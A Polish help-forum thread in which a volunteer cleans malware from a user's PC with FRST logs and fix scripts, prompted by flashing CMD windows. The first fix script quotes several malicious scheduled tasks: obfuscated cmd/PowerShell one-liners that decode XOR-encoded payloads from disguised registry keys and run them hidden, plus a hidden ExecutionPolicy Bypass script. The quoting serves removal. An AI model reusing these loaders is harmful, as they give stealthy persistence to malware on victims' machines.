Wyskakujące okienko CMD

Cześć Panowie,

widziałem, że kilka osób miało już ten problem - mam i ja. Otóż, raz na jakiś czas wyskakuje mi na pół sekundy okno CMD, po czym znika - denerwujące jest to, ponieważ podczas grania choćby w fifę to CMD przejmuje priorytet ekranu. Miałem Driver Setup Utility - usunąłem, lecz problem nie ustąpił. Załączam logi z frst, bo widziałem, że dzięki nim ktoś naprawił błąd :slight_smile:
FRST.txt (50,5 KB)

Daj jeszcze Addition.

Wykonaj profilaktyczne skany:

  • RogueKiller Anti Malware
    Zalecane pobranie wersji przenośnej (portable). Przed uruchomieniem pełnego skanowania należy włączyć w ustawieniach bezsygnaturowy „moduł MaIPE (BETA)”; opcjonalnie „skanuj z pełną wydajnością” (ustawienia → ustawienia skanowania).

  • Emsisoft Emergency KIT
    Przed rozpoczęciem skanowania wykonaj aktualizację sygnatur, następnie wybierz „malware skan”. Upewnij się, że wykrywanie potencjalnie niechcianych programów (PNP) jest włączone. Raporty z pracy skanera znajdują się w lokacji C:\EEK\Reports. Przenośny skaner Emsisoftu pozostaw do okresowych skanowań swojego urządzenia.

Uruchom FRST/FRST64.exe, wciśnij kombinację klawiszy ctrl + y. Otworzy się notatnik, do którego wklej zawartość skryptu. Zamknij i zapisz. W FRST kliknij „napraw” →

SystemRestore: On
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\Run: [MicrosoftEdgeAutoLaunch_3494A7FD3B4B2046A272064D50322C4D] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3852200 2022-10-06] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [38502416 2022-09-12] (Piriform Software Ltd -> Piriform Software Ltd)
IFEO\osppsvc.exe: [VerifierDlls] SppExtComObjHook.dll
IFEO\SppExtComObj.exe: [VerifierDlls] SppExtComObjHook.dll
GroupPolicy: Ograniczenia ? <==== UWAGA
Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA
Task: {00084CF0-38B6-4F38-908E-238B74F496E5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {0479D8EF-C2BD-4AA2-9CB2-83B18F5D06E8} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2022-09-12] (Piriform Software Ltd -> Piriform)
Task: {05FF85F4-C497-43D9-9002-DD6607051C12} - System32\Tasks\Opera scheduled Autoupdate 1659621167 => C:\Users\erykj\AppData\Local\Programs\Opera\launcher.exe [2534856 2022-10-06] (Opera Norway AS -> Opera Software)
Task: {0C850417-4230-4FD7-8AB8-ACC1B5F5D90F} - System32\Tasks\e-pity2021_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe notify 1 28.02.2023 (Brak pliku)
"C:\Windows\System32\Tasks\Microsoft\Windows\Security\Pwdless\IntelligentPwdlessTask" nie został odblokowany. <==== UWAGA
Task: {27CE9D59-9D48-4D29-99BC-64657AEBA494} - System32\Tasks\Microsoft\Windows\Security\Pwdless\IntelligentPwdlessTask
Task: {426A3520-BDE8-4431-AF85-DECC35044C5A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => C:\WINDOWS\system32\MusNotification.exe /RunOnBattery RebootDialog (Brak pliku)
Task: {4D0643BE-9F77-42DC-B53F-6DD32D8C8AF3} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (Brak pliku)
Task: {57254EEB-E5BD-4C92-8B0A-DD8ABE1A0CF1} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Iu3jS8K0\8FF5FB86-BCE5-4907-90D8-0ECEE8199424 => cmd.exe /C EchO IEX "iCM ([scrIPtblOck]::creatE([StrIng]::join('', ((GeT-iTemPropeRTy -PATh 'HkLm:\SoFtwArE\DOlBYIU3Js8k0').'iu3JS8K0TK' | % { [cHaR](`$_ -bXor 50) }))))" | pOWERShEll -windowsTyLE hIddEn <==== UWAGA
Task: {8C39E78E-9E7D-4605-8355-66A00C058A6E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\eqD0Tspn\95FA8C11-9B1D-43B7-8674-06C3F6D72B58 => cmd.exe /C EcHo Iex "ICm ([SCrIPtbLock]::CReATE([STrING]::jOIN('', ((geT-ItEMprOPERty -pAth 'HKlM:\SOftwArE\GOOgLEeQD0tSP').'eqD0tsPN6' | % { [Char](`$_ -BxOr 136) }))))" | poweRSHELL -wInDoWstylE hIddEN <==== UWAGA
Task: {942288F3-44BF-4C3B-8354-275C7F4B39B8} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\0b644897-e43e-498e-b9b4-9645f3f0ed65.ps1" <==== UWAGA
Task: {B342A793-2BAE-407F-BE91-781178DA3FEA} - System32\Tasks\e-pity2021_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe notify 2 02.05.2023 (Brak pliku)
Task: {CA9A71D4-E2F2-427A-95C1-169C4FE88B0A} - System32\Tasks\ASCU_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\Monitor.exe /Task (Brak pliku)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Brak pliku)
Task: {D95CA40C-5737-4DE7-8C09-A006CB84B285} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2577752 2022-09-22] (Overwolf Ltd -> Overwolf LTD)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => C:\WINDOWS\system32\MusNotification.exe (Brak pliku)
Task: {E2F7D4EE-322D-480C-822D-F31203A82152} - System32\Tasks\Sump Task (One-Time) => C:\Program Files (x86)\IObit\IObit Uninstaller\sump.exe /sup2 (Brak pliku)
Task: {ECCA73B9-F297-4659-AC5A-486F8D4D081C} - System32\Tasks\Microsoft\Windows\Management\Provisioning\DOczyC\67553203-5865-4E87-8645-C9B0351888CB => cmd.exe /c EChO IEX "ICM ([ScRiPtblOCk]::CrEATE([STRIng]::jOIN('', ((Get-iteMpROPerTY -paTh 'HklM:\software\7-zIpmC9ij').'DocZYC2w8uG' | % { [chaR](`$_ -BXOR 229) }))))" | PoWerSHell -WindoWStyLE Hidden <==== UWAGA
Task: {F02C6C68-84F9-47A0-B27F-9C3B9D2C9275} - System32\Tasks\CCleanerCrashReporting => C:\Program Files\CCleaner\CCleanerBugReport.exe [4666896 2022-09-12] (Piriform Software Ltd -> Piriform Software) -> --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "97d6b5ac-dd8d-4792-920b-afffad823e30" --version "6.04.10044" --silent
Task: {F1F29520-68BF-4880-9686-A4F868477C1F} - System32\Tasks\Microsoft\Windows\Management\Provisioning\e7oki3j\A4F62878-9970-46F4-8C5B-782FC67F8EFB => cmd.exe /C eCHO iex "ICM ([scRipTblOck]::CREAtE([StrINg]::joIN('', ((get-ItemPROpeRTY -PaTH 'HKLm:\sOfTWaRe\aPPLE INc.e7oKI3J').'E7OkI3Jr0' | % { [cHar](`$_ -bxOR 132) }))))" | poWERSHElL -WiNdOWsTylE hiDDEn <==== UWAGA
Task: C:\WINDOWS\Tasks\CCleanerCrashReporting.job => C:\Program Files\CCleaner\CCleanerBugReport.exe
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0c6d0e6e-ce1c-4c74-a83c-377aa0899aa0}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{a90727ca-3f4e-4bc8-b875-2f54e0a71810}: [DhcpNameServer] 10.236.46.5 10.236.136.5
Hosts:
C:\Users\erykj\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk
C:\Users\erykj\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg]
S3 EAAntiCheat; system32\drivers\eaanticheat.sys [X]
S3 iobit_monitor_server2021; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\Monitor_win10_x64.sys [X]
S4 IUFileFilter; \??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IUFileFilter.sys [X]
S3 IUProcessFilter; \??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IUProcessFilter.sys [X]
S3 IURegistryFilter; \??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IURegistryFilter.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2022-01-04] <==== UWAGA (zerobajtowy plik/folder)
EmptyTemp: 

Plik naprawczy przeznaczony jest tylko dla autora wątku!
Po wykonaniu skryptu i ponownym uruchomieniu załącz utworzony fixlog.txt

Daj znać jeśli skanery wykryją jakieś zagrożenie.
Następnie załącz nowe logi FRST, pamiętając także o pliku Addition.txt :wink:

Po co? To praktycznie nic przestrzeni nie zajmuje a te informacje moga sie przydać.

1 polubienie

Faktycznie - urok pisania „na szybko” w międzyczasie podczas wykonywania innych zajęć. Poprawione.

Na wstępie - Panowie, dzięki za zainteresowanie. Zrobiłem fix’a w FRST - fix log, nowy i addition w załącznikach, wysyłam wszystko, by znów czegoś nie pominąć. Rogue Killer znalazł 5 przypadków - log w załączniku. Drugi program nic nie wykazał.
Addition.txt (49,7 KB)
Fixlog.txt (20,4 KB)
FRST.txt (42,8 KB)
raport rogue killer.txt (7,5 KB)

Odinstaluj:

  • CCleaner
  • Adobe Flash Player
  • NVIDIA GeForce Experience
  • FoneLab for iOS
  • IObit Advanced SystemCare Ultimate (pozostałości zostaną oznaczone do usunięcia)

Zaktualizuj 7-Zip, Tixati. Do czyszczenia pozostałości po plikach wystarczy BleachBit.

Wykonaj jeszcze jeden skan AdwCleanerem.
Po skończonym skanowaniu pomiń linie oznaczone jako preinstalowane.
Resztę odnalezionych elementów przenieś do kwarantanny.

Uruchom FRST/FRST64.exe, wciśnij kombinację klawiszy ctrl + y. Otworzy się notatnik, do którego wklej zawartość skryptu. Zamknij i zapisz. W FRST kliknij „napraw” →

CreateRestorePoint:
CloseProcesses:
Task: {F85174DB-DB73-4A00-89E5-8F3D7FB701CE} - \CCleanerCrashReporting -> Brak pliku <==== UWAGA
Task: {40FFE185-3600-45AD-986C-D7005AAE47E7} - System32\Tasks\CorelUpdateHelperTask-567FA22B570FA7F72F0A4E9E5D02E7E6 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe -resume (Brak pliku)
Task: {A4446A55-5D6D-435A-874B-D09B71659A07} - System32\Tasks\HardDiskSentinel\Hard Disk Sentinel_erykj => C:\Program Files (x86)\Hard Disk Sentinel\HDSentinel.exe [6165504 2022-10-04] (H.D.S. Hungary) [Brak podpisu cyfrowego]
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\ASCExtMenu_64.dll [2021-11-26] (IObit CO., LTD -> IObit)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\ASCExtMenu_64.dll [2021-11-26] (IObit CO., LTD -> IObit)
ContextMenuHandlers3: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\ASCExtMenu_64.dll [2021-11-26] (IObit CO., LTD -> IObit)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\ASCExtMenu_64.dll [2021-11-26] (IObit CO., LTD -> IObit)
2022-10-04 18:48 - 2022-01-04 01:20 - 000000000 ____D C:\Program Files (x86)\IObit
2022-10-04 18:47 - 2022-01-03 01:10 - 000000000 ____D C:\Users\erykj\AppData\Roaming\IObit
2022-10-04 18:47 - 2022-01-03 01:10 - 000000000 ____D C:\Users\erykj\AppData\LocalLow\IObit
2022-10-04 18:47 - 2022-01-03 01:10 - 000000000 ____D C:\ProgramData\IObit
2022-09-29 16:01 - 2022-09-29 16:03 - 1482174464 _____ C:\Users\erykj\Downloads\Win10_21H2_Polish_x64.iso
2022-10-12 16:04 - 2022-10-12 16:04 - 000000000 ____D C:\Users\erykj\Desktop\FRST-OlderVersion
C:\Program Files (x86)\FoneLab\FoneLab for iOS
ContextMenuHandlers3: [HashCheck Shell Extension] -> {705977C7-86CB-4743-BFAF-6908BD19B7B0} =>  -> Brak pliku
AlternateDataStreams: C:\OneDriveTemp:err [1600]
AlternateDataStreams: C:\ProgramData\mntemp:8EAD8B3507 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Legion Arena.lnk:20903A5BF7 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk:F208FC6732 [3442]
AlternateDataStreams: C:\Users\erykj\Dane aplikacji:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\erykj\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [8232]
EmptyTemp:

Po wykonaniu skryptu i ponownym uruchomieniu załącz utworzony fixlog.txt
@furionjezior - czy problem ustąpił?

Mi też na pół sekundy wyskakują nawet 3 nałożone na siebie okienka CMD na czarnym tle, nie zawsze to występuje, jest to rzadkie zjawisko, ale jednak. Dzieje się tak przeważnie przy starcie systemu Windows 10.

Mi się wydaję, że to nie jest wirus. Bo u mnie też takie coś się pojawia i raczej to jest normalne, chociaż czasami też martwiłem się czy czegoś złego nie zainstalowałem, ale wszystko jest OK.

Więc raczej problemu dopatrywałbym się w działaniu systemu operacyjnego.

to nie jest normalne :smiley: to rzadkie zjawisko, czasem pojawiające się po aktualizacji

Na twoim miejscu wstawiłbym logi z FRST i poprosił kogoś by to sprawdził.
Normalne to nie jest. W Win 11 moze być pare przyczyn.

Hej, usunąłem programy o których wspomniałeś, dodatkowo wykonałem skan ADWcleanerem. Jeśli chodzi o pozostałości w Bleach, któreś konkretnie rzeczy z lewej mam zaznaczyć, czy dosłownie wszystkie? Pytam, ponieważ choćby sekcja Głębokie skanowanie brzmi dość poważnie, więc wolę zapytać przed działaniem. Fixlog w załączniku oraz nowe skany z FRST choć mogą przekłamywać, ponieważ Bleacha jeszcze nie odpalałem
Addition.txt (55,9 KB)
FRST.txt (40,5 KB)
. Dziękuję za pomoc, ponownie
Fixlog.txt (7,5 KB)

Usunę tylko pozostałości po zaplanowanych zadaniach i skanery.

Uruchom FRST/FRST64.exe, wciśnij kombinację klawiszy ctrl + y. Otworzy się notatnik, do którego wklej zawartość skryptu. Zamknij i zapisz. W FRST kliknij „napraw” →

CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\Run: [GogGalaxy] => B:\GOG Galaxy\GalaxyClient.exe /launchViaAutoStart (Brak pliku)
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\erykj\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (Brak pliku)
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\erykj\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Brak pliku)
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\RunOnce: [Uninstall 22.202.0925.0001] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\erykj\AppData\Local\Microsoft\OneDrive\22.202.0925.0001" (Brak pliku)
Task: {179F007F-95B0-422B-BA5F-980BF9F705F8} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-1815923467-2363033384-3295014813-1001 => C:\Users\erykj\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe (Brak pliku)
Task: {7F7E2B42-79A1-4482-B039-67975912207F} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe PendingTask (Brak pliku)
Task: {8940F344-4376-4806-852F-0E5EFB420EC4} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe /CM -search R -action INSTALL -includerebootpackages 1,3,4,5 -noicon -noreboot -nolicense -defaultupdate -schtask (Brak pliku)
S3 SUService; "C:\Program Files (x86)\Lenovo\System Update\SUService.exe" [X]
S1 epp; \??\C:\EEK\bin64\epp.sys [X]
FirewallRules: [{2B8E5022-8D72-4661-BC97-7647B844E7D2}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe => Brak pliku
FirewallRules: [{E63D6B0C-5FAE-4461-9527-70F67D4A8576}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe => Brak pliku
HKU\S-1-5-21-1815923467-2363033384-3295014813-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKLM\...\StartupApproved\Run32: => "FoneLab for iOSAppService"
2022-09-27 12:58 - 2022-09-27 12:58 - 000141731 _____ C:\WINDOWS\system32\0b644897-e43e-498e-b9b4-9645f3f0ed65.ps1
2022-10-12 16:21 - 2022-01-05 01:16 - 000000000 ____D C:\Users\erykj\AppData\Roaming\WindowsSettingsDrive
2022-10-13 16:30 - 2022-10-13 17:14 - 000000000 ____D C:\AdwCleaner
2022-10-13 16:30 - 2022-10-13 16:30 - 008791352 _____ (Malwarebytes) C:\Users\erykj\Desktop\adwcleaner.exe
2022-10-12 16:13 - 2022-10-12 16:21 - 000000000 ____D C:\ProgramData\RogueKiller
2022-10-12 16:11 - 2022-10-12 16:11 - 034433976 _____ C:\Users\erykj\Desktop\RogueKiller_portable64.exe
2022-10-12 16:25 - 2022-10-13 15:44 - 000000000 ____D C:\EEK
2022-10-12 16:25 - 2022-10-12 16:25 - 000000000 ____D C:\ProgramData\Emsisoft
2022-10-12 16:12 - 2022-10-12 16:12 - 291527104 _____ C:\Users\erykj\Desktop\EmsisoftEmergencyKit.exe

Nie odpowiedziałeś, czy problem dalej występuje.
Jeśli nie, to oznacz post który rozwiązał Twój problem i usuń FRST. :wink:

W BleachBit optymalnie zostaw domyślne funkcje. Nie zalecam wykonywania wymazywania (zerowania) pustej przestrzeni. Ponadto przy zaznaczeniu funkcji masz monit ostrzegawczy.

By usunąć wszystkie pliki/foldery utworzone przez FRST oraz narzędzie jako takie, zmień nazwę pliku FRST/FRST64.exe na uninstall.exe i uruchom ten plik. Procedura wymaga ponownego uruchomienia urządzenia.

PS: Wysłałem Tobie wiadomość prywatną.

Faktycznie, nie odpisałem, ale nie miałem też zbytnio okazji przetestować. Jutro, z racji piątku i weekendu przysiądę po pracy i zobaczę, mam nadzieję, że się udało. Bez względu na wynik - ogrom wdzięczności z mojej strony, na Mikołajki chyba trzeba będzie paczkę Ci przesłać inpostem :smiley: dam znać co do efektu oczywiście! :slight_smile:

1 polubienie

Ten temat został automatycznie zamknięty 90 dni po ostatnim wpisie. Tworzenie nowych odpowiedzi nie jest już możliwe.